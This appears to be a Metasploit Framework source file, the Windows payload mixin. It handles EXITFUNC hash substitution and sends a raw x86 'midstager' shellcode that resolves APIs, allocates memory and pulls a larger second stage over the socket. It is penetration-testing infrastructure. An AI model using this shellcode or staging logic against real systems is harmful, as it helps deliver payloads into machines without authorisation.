metasploit-framework/lib/msf/core/payload/windows.rb

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# -*- coding: binary -*-
require 'msf/core'
###
#
# This class is here to implement advanced variable substitution
# for windows-based payloads, such as EXITFUNC. Windows payloads
# are expected to include this module if they want advanced
# variable substitution.
#
###
module Msf::Payload::Windows
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require 'msf/core/payload/windows/prepend_migrate'
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# Provides the #prepends method
# XXX: For some unfathomable reason, the order of requires here is
# important. If this include happens after require'ing the files
# below, it causes the windows/exec payload (and probably others) to
# somehow not have PrependMigrate despite having Payload::Windows,
# which leads to a NoMethodError on #prepends
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include Msf::Payload::Windows::PrependMigrate
require 'msf/core/payload/windows/dllinject'
require 'msf/core/payload/windows/exec'
require 'msf/core/payload/windows/loadlibrary'
require 'msf/core/payload/windows/reflectivedllinject'
require 'msf/core/payload/windows/x64/reflectivedllinject'
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#
# ROR hash associations for some of the exit technique routines.
#
@@exit_types =
{
'seh' => 0xEA320EFE, # SetUnhandledExceptionFilter
'thread' => 0x0A2A1DE0, # ExitThread
'process' => 0x56A2B5F0, # ExitProcess
'none' => 0x5DE2C5AA, # GetLastError
}
def generate
return prepends(super)
end
#
# This mixin is chained within payloads that target the Windows platform.
# It provides special variable substitution for things like EXITFUNC and
# automatically adds it as a required option for exploits that use windows
# payloads. It also provides the migrate prepend.
#
def initialize(info = {})
ret = super( info )
# All windows payload hint that the stack must be aligned to nop
# generators and encoders.
if( info['Arch'] == ARCH_X86_64 )
if( info['Alias'] )
info['Alias'] = 'windows/x64/' + info['Alias']
end
merge_info( info, 'SaveRegisters' => [ 'rsp' ] )
elsif( info['Arch'] == ARCH_X86 )
if( info['Alias'] )
info['Alias'] = 'windows/' + info['Alias']
end
merge_info( info, 'SaveRegisters' => [ 'esp' ] )
end
#if (info['Alias'])
# info['Alias'] = 'windows/' + info['Alias']
#end
register_options(
[
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Msf::OptEnum.new('EXITFUNC', [true, 'Exit technique', 'process', @@exit_types.keys])
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], Msf::Payload::Windows )
ret
end
#
# Replace the EXITFUNC variable like madness
#
def replace_var(raw, name, offset, pack)
if (name == 'EXITFUNC')
method = datastore[name]
method = 'thread' if (!method or @@exit_types.include?(method) == false)
raw[offset, 4] = [ @@exit_types[method] ].pack(pack || 'V')
return true
end
return false
end
#
# For windows, we check to see if the stage that is being sent is larger
# than a certain size. If it is, we transmit another stager that will
# ensure that the entire stage is read in.
#
def handle_intermediate_stage(conn, payload)
if( self.module_info['Stager']['RequiresMidstager'] == false )
conn.put( [ payload.length ].pack('V') )
# returning false allows stager.rb!handle_connection() to prepend the stage_prefix if needed
return false
end
return false if (payload.length < 512)
# The mid-stage works by reading in a four byte length in host-byte
# order (which represents the length of the stage). Following that, it
# reads in the entire second stage until all bytes are read. It reads the
# data into a buffer which is allocated with VirtualAlloc to avoid running
# out of stack space or NX problems.
# See the source file: /external/source/shellcode/windows/midstager.asm
midstager =
"\xfc\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x50\x1c\x8b\x12\x8b" +
"\x72\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32\x0f\x85\xeb\xff" +
"\xff\xff\x8b\x6a\x08\x8b\x45\x3c\x8b\x4c\x05\x78\x8b\x4c\x0d\x1c" +
"\x01\xe9\x8b\x71\x3c\x01\xee\x60\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b" +
"\x5b\x14\x8b\x73\x28\x6a\x18\x59\x31\xff\x31\xc0\xac\x3c\x61\x7c" +
"\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81\xff\x5b\xbc\x4a\x6a" +
"\x8b\x6b\x10\x8b\x1b\x75\xdb\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef" +
"\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0" +
"\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x81\xfa\x54" +
"\xca\xaf\x91\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f" +
"\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x08\x61\x89\xe3\x6a" +
"\x00\x6a\x04\x53\x57\xff\xd6\x8b\x1b\x6a\x40\x68\x00\x30\x00\x00" +
"\x53\x6a\x00\xff\xd5\x89\xc5\x55\x6a\x00\x53\x55\x57\xff\xd6\x01" +
"\xc5\x29\xc3\x85\xdb\x75\xf1\xc3"
# Prepend the stage prefix as necessary, such as a tag that is needed to
# find the socket
midstager = (self.stage_prefix || '') + midstager
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
# Transmit our intermediate stager
conn.put(midstager)
# Sleep to give enough time for the remote side to receive and read the
# midstage so that we don't accidentally read in part of the second
# stage.
Rex::ThreadSafe.sleep(1.5)
# The mid-stage requires that we transmit a four byte length field that
# it will use as the length of the subsequent stage.
conn.put([ payload.length ].pack('V'))
return true
end
#
# Share the EXITFUNC mappings with other classes
#
def self.exit_types
@@exit_types.dup
end
end